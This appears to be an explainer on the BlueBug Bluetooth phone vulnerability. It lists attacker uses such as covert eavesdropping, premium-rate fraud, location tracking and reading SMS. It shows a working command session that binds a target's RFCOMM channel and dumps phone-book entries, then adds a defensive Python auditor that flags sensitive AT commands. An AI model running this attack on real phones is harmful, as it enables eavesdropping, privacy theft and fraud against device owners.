BlueBug-Bluetooth Loophole
BlueBug is the name of a Bluetooth security loophole on some Bluetooth-enabled cell phones. This loophole can be used to attack a Bluetooth-enabled mobile phone: the attacker can send messages, download phone books and call lists, and more.
Phone Calls
As mentioned above, the BlueBug security loophole allows the attacker to initiate phone calls from the victim's device. Things that can be done with initiating phone calls include:
- eavesdropping
When the victim passes by, a phone owned by the attacker (e.g. an anonymously used prepaid-card phone) is called. From this moment on, the attacker is able to listen to all conversations the victim has until the victim hangs up the phone.
- causing financial damage
Since phone calls to any number can be established, it is also possible to call premium service numbers from the victim's device. If the victim does not realize that a phone call is connected to a premium service number, this would cause severe financial damage to the victim.
SMS
Sending SMS from the victim's device can be used for quite a lot of things:
- finding out the victim's phone number
The phone number of the respective device is not stored at a predefined location. The device's number can be obtained by sending an SMS from the victim's device to a phone that is owned by the attacker.
- causing financial damage
There are quite a lot of SMS-based services that cost the client about 3 Euros per SMS. Usually, these services are used to sell ringtones and logos. There are also news subscriptions that can be ordered by SMS and that continuously cause costs to the victim.
- tracking the victim
As a location-based service, some providers allow other users to locate their customers by the GSM global cell ID of the cell their phone is connected to. Depending on how the respective GSM cells are configured, this information can be very detailed. In order to do this, the provider must get permission from the customer. This permission is usually given via SMS (which is sent by the attacker).
- revealing secrets
SMS messages are often used to silently communicate secret information to other people. Reading the SMS messages on the attacked device often intrudes on the victim's privacy. Paparazzi could use this attack in order to find out more about certain celebrities.
BlueBug example
#scan for bluetooth devices:
oscar@darkside $ hcitool scan
Scanning...
00:0E:6D:10:1D:B6 Nokia 6310i
00:05:7A:01:A3:80 Airbus A380
00:06:6E:21:69:C2 Bluespoon AX
00:0F:DE:6C:61:04 T610
#bind channel 17 of target device to /dev/rfcomm42:
oscar@darkside $ rfcomm bind 42 00:0E:6D:10:1D:B6 17
#connect to AT terminal via, for example, cu:
oscar@darkside $ cu -l /dev/rfcomm42
Connected.
AT+CPBS="ME"
OK
AT+CPBR=1
+CPBR:1,"",,"ParisHilton"
OK
~.
Disconnected.
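
For the defender's side of the session above, the following added example (not part of the original page) audits a log of AT lines received over a phone's Bluetooth serial channel and reports the commands that correspond to the impacts described here. It goes beyond the two commands in the transcript to the standard GSM AT commands for dialing and SMS; the log format, peer addresses, phone number and category names are assumptions constructed for the example.

```python
import re

# Impact categories named in the article, mapped to standard GSM AT commands
# (3GPP TS 27.007 / 27.005). The mapping itself is this example's assumption.
RULES = {"+CPBR": "phonebook-read", "+CPBF": "phonebook-read",
         "+CMGR": "sms-read", "+CMGL": "sms-read",
         "+CMGS": "sms-send", "+CMSS": "sms-send"}

def split_commands(line):
    """Split one AT line into commands; ';' chains them after a single 'AT'."""
    line = line.strip()
    if not re.match(r"(?i)AT", line):
        return []                      # response or noise, not a command line
    # Do not split on ';' inside a quoted string argument.
    parts = re.findall(r'(?:"[^"]*"|[^;])+', line[2:])
    return [p.strip() for p in parts if p.strip()]

def classify(cmd):
    """Return the impact category of one command, or None if not sensitive."""
    upper = cmd.upper()
    if re.match(r"D[TP]?[\d+>*#]", upper):
        return "call-initiated"        # ATD<number> or ATD><phone book entry>
    m = re.match(r"(\+[A-Z]+)(=\?|\?)?", upper)
    if not m or m.group(2):            # '=?' and '?' forms only query settings
        return None
    return RULES.get(m.group(1))

def audit(log_text):
    """Return (peer, category, command) for every sensitive command received."""
    findings = []
    for line in log_text.splitlines():
        m = re.match(r"(\S+)\s+>\s+(.*)", line)   # '>' marks a line from the peer
        if not m:
            continue
        for cmd in split_commands(m.group(2)):
            category = classify(cmd)
            if category:
                findings.append((m.group(1), category, cmd))
    return findings

# Constructed sample log (hypothetical format: "<peer address> <direction> <text>").
SAMPLE_LOG = '''AA:BB:CC:00:00:01 > AT+CPBS="ME"
AA:BB:CC:00:00:01 < OK
AA:BB:CC:00:00:01 > AT+CPBR=1
AA:BB:CC:00:00:01 < +CPBR:1,"",,"ParisHilton"
AA:BB:CC:00:00:02 > AT+CPBR=?
AA:BB:CC:00:00:02 > at+cmgf=1;+cmgl="ALL"
AA:BB:CC:00:00:02 > ATD+490000000;
'''

if __name__ == "__main__":
    for peer, category, cmd in audit(SAMPLE_LOG):
        print(f"{peer}  {category:15} {cmd}")
```

Selecting a phone book with AT+CPBS and querying a range with AT+CPBR=? are not reported on their own; only commands that return entries, read or send messages, or dial are.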